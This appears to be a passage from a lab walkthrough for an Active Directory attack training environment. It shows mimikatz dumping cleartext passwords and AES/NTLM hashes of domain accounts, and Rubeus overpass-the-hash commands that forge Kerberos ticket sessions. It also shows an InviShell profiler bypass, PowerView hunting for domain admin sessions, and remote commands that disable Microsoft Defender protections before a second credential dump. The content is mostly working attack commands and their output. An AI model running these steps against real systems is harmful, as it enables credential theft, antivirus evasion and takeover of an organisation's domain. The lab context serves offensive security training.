[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 208687 (00000000:00032f2f)

Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:24 AM
SID : S-1-5-96-0-2

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 98121 (00000000:00017f49)

Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1114

* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
* Key List :
aes256_hmac 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
aes128_hmac 86a353c1ea16a87c39e2996253211e41
rc4_hmac_nt cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old cc098f204c5887eaa8253e7c2749156f
rc4_md4 cc098f204c5887eaa8253e7c2749156f
rc4_hmac_nt_exp cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old_exp cc098f204c5887eaa8253e7c2749156f
Authentication Id : 0 ; 98117 (00000000:00017f45)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1117

* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
aes128_hmac 449e9900eb0d6ccee8dd9ef66965797e
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-20

* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 20904 (00000000:000051a8)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-96-0-0

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 20826 (00000000:0000515a)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-96-0-1

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 246873 (00000000:0003c459)

Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:13 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1115

* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:44 AM
SID : S-1-5-18

* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
 Username AES Hashes
websvc 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
appadmin 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
srvadmin 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4

Username NTLM Hashes

websvc cc098f204c5887eaa8253e7c2749156f
appadmin d549831a955fee51a43c83efb3928fa7
srvadmin a98e18228819e8eec3dfa33cb68b0728

We will now further enumerate where a domain admin session is present. For this, we will open a
command prompt or a PowerShell session in the context of the obtained users using OverPass the Hash
attack.

OverPass The Hash

websvc
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : OBD5C0PO
[*] Domain : BI5N2842
[*] Password : 31X4JLQI
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 6108
[+] LUID : 0xa437374

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALwebsvc
[*] Using aes256_cts_hmac_sha1 hash:
2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Target LUID : 172192628
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFjc/lWbb37U8wXk744S3QtZOWdcwRuoYjzZ5Fgmu/wdOAMv7Y
 mKPPQQI6nvS8r+peDqIaxAgzndv+fdUeENcVEOW+kEaLgbgFzlRUQy9espJsi3naD261s8IXqWgNSqdL
K/iU3myX34W/6cK2+FkiB4PcIYgp5olTW/7ti9lJgtyKaV2UMVPLoIH+PwbjknFD0QDZR2b70mOxNcoj
YgBN7fYZ4Dz29HP3SNYnf0lXADoVT5bZ8q0ldB/dXcXqvUcp6OC49TBGV4Pujd5a81IVOAgzdzLvWgSK
B5u9x11T3bliNvxpFcs0J048qhNsKx+twCV9IwH92dQaC8lMuwhrqN+tCLg3r1JY08ShuvTmayMbZ508
NexpXbHujrXID5C+40Zb9xKkg+Z2/SOSGWA5aVsTgY+mJgWw6UyJCBEAE9SSVd/d+0qXh039MR+YROX6
ma/ri50dLxj+WFrs4qDsVEOmItkpQllJORhxV9in8HoDjqUH9jUHS2l2M7iCQa7fJYY0pY7W2FwhxEkB
jKLLGXaFB2KiFXLvQrh1L5undVnGzvjxb2TLVujDQvu9eSDA89Ux+/5UrI/kFd75lffQlBhwmzjEWiJb
kvDYKE1RDDG8lpz5dqYqQOPozZHDSI+6WsjjUrH40HCq20luQUKgrTMyXmmzPGgoDI0HLqLGcund+nS6
m6AXGPXArxir9nSRT/qUX7UC1eHnCauYa+gWAqQGHh5dv/H9nr0VeXaoakhdR4tLlx1ZW2ibbhPyw/oB
RhIASEZoks4/ug/PGjeaeiZV86Ks4ydeBGp4sUYyH51MwO5fHH0x+bK4Q9o3B/6/wichAmpps9mGOQjc
KmWgCmgC4rRknq49uQDqfuqOEzcZ8iOmcQFLVjC6xtpMujYB4/JlydMA8TzvCbmuffhcBcDSNel6GGy1
WEhVTnBcZEMn9QzyvDPGolFJEcqQ7YiyABHaExAPhucvxY3S2C/pqR858KfWKpa1CP8UgRhXoWPq7OM7
RQ8JWygq1YBqkwLPwBKTKLeSDVOprQtyRfeYD/w3lkQrrFoFhDZoQnODEVqJzXxXOJSx2ZWXW7UA+84I
SNGXJB1vu+1mr5DXxi9qBwj81JZwZTQYhouQ9RFAtIScK5HtXGKxZY92sfBS+A9Fs9lPIo0tsppXafdi
rmsNqZdRViAoYSAcbcQdOqTti0SpOiFHVLOjZt3ggGtsMCgSuFqf/fPAqYvCyH6WOtqghIWf9I2xFGBM
YtFIA1TZvSW0ac+Mbv+iMaJhBYxK4VGYLPqIO/7M/KbO6EgWFv8IZg/7QAumtzx22Ek3ioE8O1JuTSbx
KJ1ezrdPmN6JSl3wvDSr4QHqiMPPYiMcZgy7gV8J5K+AbTNsIF15jtrQeV/8zfQ5s+6+XZyracsx45+z
ZsM/i9nomJA6hyaJPWKFGpYYq8jjjdKZceQqcifu1nBqzReZGaOCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCBFUXZbhf0dJasoIrndrr+M8gz0li1NMV1ZTzrxMd906Ec
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDYyNjA4MjEzM1qmERgPMjAyNDA2MjYxODIxMzNapxEYDzIwMjQwNzAzMDgyMTMzWqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaRE9MTEFSQ09SUC5N
T05FWUNPUlAuTE9DQUw=
[*] Target LUID: 0xa437374
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : websvc
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/26/2024 1:21:33 AM
EndTime : 6/26/2024 11:21:33 AM
RenewTill : 7/3/2024 1:21:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : gRVF2W4X9HSWrKCK53a6/jPIM9JYtTTFdWU868THfdM=
ASREP (key) : 2D84A12F614CCBF3D716B8339CBBE1A650E5FB352EDC8E879470ADE07E5412D7

A new PowerShell Window opens.

PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-adminsrv -ScriptBlock {
$env:username;$env:computername }
[dcorp-adminsrv] Connecting to remote server dcorp-adminsrv failed with the following error
message : Access is
denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-adminsrv:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

The user websvc does not have administrative privileges on the machine dcorp-adminsrv.
Appadmin
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:appadmin
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : FLU53FIM
[*] Domain : PRU3HJCR
[*] Password : R51CW1DT
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4940
[+] LUID : 0x16a80e

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALappadmin
[*] Using aes256_cts_hmac_sha1 hash:
68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[*] Target LUID : 1484814
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x16a80e
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : appadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/26/2024 6:13:13 AM
EndTime : 6/26/2024 4:13:13 PM
RenewTill : 7/3/2024 6:13:13 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : pX2Vk3rCHfOL9Vkpd9ISEVVnwAHtGrT/w3sG5Hj5wa0=
ASREP (key) : 68F08715061E4D0790E71B1245BF20B023D08822D2DF85BFF50A0E8136FFE4CB

A new PowerShell Window opens.

PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-adminsrv -ScriptBlock {
$env:username;$env:computername }
appadmin
DCORP-ADMINSRV
PS C:\Windows\system32> C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-DomainUserLocation -CheckAccess

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :
UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

There is a session of Administrator (Domain Admin) on the machine DCORP-APPSRV. We will now dump
the credentials from the machine DCORP-APPSRV to see if we can obtain the hashes of the Domain Admin
"Administrator".
PS C:\Windows\system32> $Session = New-PSSession -ComputerName DCORP-APPSRV
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableRealtimeMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableBehaviorMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIntrusionPreventionSystem $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIOAVProtection $true}
PS C:\Windows\system32> . C:\Ad\tools\Invoke-MimiEx_Modified.ps1
PS C:\Windows\system32> Invoke-Mimi
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimi}

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 172030 (00000000:00029ffe)

Session : RemoteInteractive from 2
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/26/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1117

* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7

Authentication Id : 0 ; 141349 (00000000:00022825)

Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:57:04 AM
SID : S-1-5-96-0-2

* Username : DCORP-APPSRV$
 * Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-20

* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f5ae52b9f36f1e41b2f0c59a3c18aa4367c27c3e1a450ef4d4df010210d054cd
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 21211 (00000000:000052db)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-96-0-0

* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 21183 (00000000:000052bf)

Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-96-0-1

* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/26/2024 3:56:46 AM
SID : S-1-5-18

* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f5ae52b9f36f1e41b2f0c59a3c18aa4367c27c3e1a450ef4d4df010210d054cd
